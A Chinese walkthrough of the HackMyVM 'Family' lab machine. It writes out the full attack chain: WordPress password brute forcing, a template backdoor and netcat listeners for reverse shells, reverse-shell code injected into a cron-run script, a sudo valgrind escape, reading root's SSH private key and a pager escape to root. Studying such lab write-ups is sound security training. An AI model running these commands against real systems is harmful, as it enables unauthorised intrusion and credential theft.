AI 助理
备案控制台
开发者社区 数据库 文章 正文

记一次对Family靶机的渗透测试

2023-02-14 73
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 记一次对Family靶机的渗透测试

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Family

名称:(家庭)

难度:中等

创作者:cromiphi

发布日期:2021-04-30

目标:user.txt和falg.txt,root权限

搭建靶机

下载完Family.ova后,使用Oracle VM VirtualBox导入即可

导入时注意!!不要勾上USB控制器,不然会出错

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMwareKali192.168.31.185
目标机:VirtualBoxDebianIP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.31.0/24

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.31.214

扫描到22(SSH)、80(HTTP)两个端口,使用火狐浏览器访问80端口,http://192.168.2.214

是个wordpress,继续访问http://192.168.31.214/wordpress/,右击查看源码

本机加个family的hosts再继续访问

004fe2c90eab960b3628d48a1010899b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150

93d9219cabbe23b5f6a471e1cf3aac0a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

渗透测试

使用 wpscan 扫描 wordpress,没有发现可用的

wpscan --url http://family/wordpress/

使用 wpscan来爆破用户名

wpscan --url http://family/wordpress/ --enumerate u

发现一个admin

49939aeb0abc9cb8aa2f0c1b2e137f04_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用 wpscan来爆破admin用户的密码

wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin

27d4277119648cd0e51b3555326dfc09_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

访问http://family/wordpress/wp-login.php,输入账号密码,登录后台

通过修改模板写入后门,访问文件即可获取反弹shell

b585f89638525a1dac66748e4fbf6b01_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

访问404页面http://family/wordpress/wp-content/themes/twentytwentyone/404.php

新开一个终端页面开启监听

nc -lvnp 6666

6c801069487e1d3f2d4503fe5f183ac9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

检查home,发现有3个用户

e43349df70d47fddd7336bb32997df68_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

继续寻找一些有用的资源,发现了father用户的密码

d4d3940f3f8f017639acd1a46c13f55a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

新开一个终端页面来登录father用户

ssh father@192.168.31.214
id
cd /home
ls -al

发现/home/mother 属于组father

7aa5c930c584a57a7e21d09346192a48_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

上传pspy64来查看进程

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64

发现/bin/sh -c python ~/check.py每一分钟就执行一次

9e73a7d5929d4abc95adeaeca3560d2b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

这样就可以在 /home/mother/check.py 中编写一些反向shell代码,等一分钟后就可以得到mother用户的反向shell

8105a857e355ce8a36217e5ea68a1483_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

新开一个终端页面开启监听

nc -lvnp 5555

fba98d6da6e8e8028c854b187b020424_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

检查用户mother用户的权限,发现可以以用户baby运行二进制valgrind

sudo -l

86157d1b29413cc25d1108f469387357_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

执行以下命令,得到baby用户的shell

sudo -u baby valgrind /bin/bash
/bin/bash -i

f02213bf3d7ab9792a53da1b493061b4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

拿到user.txt的flag

3c84cddd3897752821aff6b568b84322_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

再次检查baby用户的权限

sudo -l

4406d91b8604de3ee5be02ca088c8351_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查看root的ssh密钥

sudo cat /root/.ssh/id_rsa

7464a604f34fd0db5b5b35f77048721b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

将ssh密钥保存下来,通过ssh密钥来提权

新开一个终端页面来登录root

chmod 600 id_rsa
ssh -i id_rsa root@192.168.31.214

460132cf2c0675f74e0d5b9cc1500a0e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现一登录就会退出,因为 /root/.ssh/authorized_keys 执行 /root/troll.sh,它就会立即退出

2eb7ff6bcfa9bb8119dc9c0b560ac65e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

现在要使shell代码不退出,需要将终端尺寸变小,使“more”无法显示全部信息再通过!/bin/bash来转义

ssh -i id_rsa root@192.168.31.214
!/bin/bash

1bc6cf16561af66bb477535f1474527a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功获取到root权限,拿到flag

声明:请勿用作违法用途,请在授权情况下使用

文章标签:
Python
Shell
关系型数据库
网络安全
数据安全/隐私保护
Oracle
亿人安全
目录
相关文章
bruce刘晓伟-18435
|
1月前
|
存储 安全 小程序
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击
bruce刘晓伟-18435
64 1
Kali渗透测试:使用Word宏病毒进行渗透攻击
GG2020gg
|
1月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
GG2020gg
21 2
bruce刘晓伟-18435
|
1月前
|
网络协议 安全 Linux
Kali渗透测试:拒绝服务攻击(一)
Kali渗透测试:拒绝服务攻击(一)
bruce刘晓伟-18435
136 2
bruce刘晓伟-18435
|
1月前
|
安全 Linux 网络安全
Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击
bruce刘晓伟-18435
45 1
bruce刘晓伟-18435
|
1月前
|
安全 网络协议 Linux
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
bruce刘晓伟-18435
57 0
bruce刘晓伟-18435
|
1月前
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
bruce刘晓伟-18435
174 0
bruce刘晓伟-18435
|
1月前
|
存储 Linux 网络安全
Kali 渗透测试:Meterpreter在Windows系统下的使用
Kali 渗透测试:Meterpreter在Windows系统下的使用
bruce刘晓伟-18435
69 0
bruce刘晓伟-18435
|
1月前
|
安全 Linux Shell
Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成“后门”
bruce刘晓伟-18435
40 0
落寞的鱼
|
安全 关系型数据库 MySQL
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
落寞的鱼
219 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
落寞的鱼
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
落寞的鱼
234 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)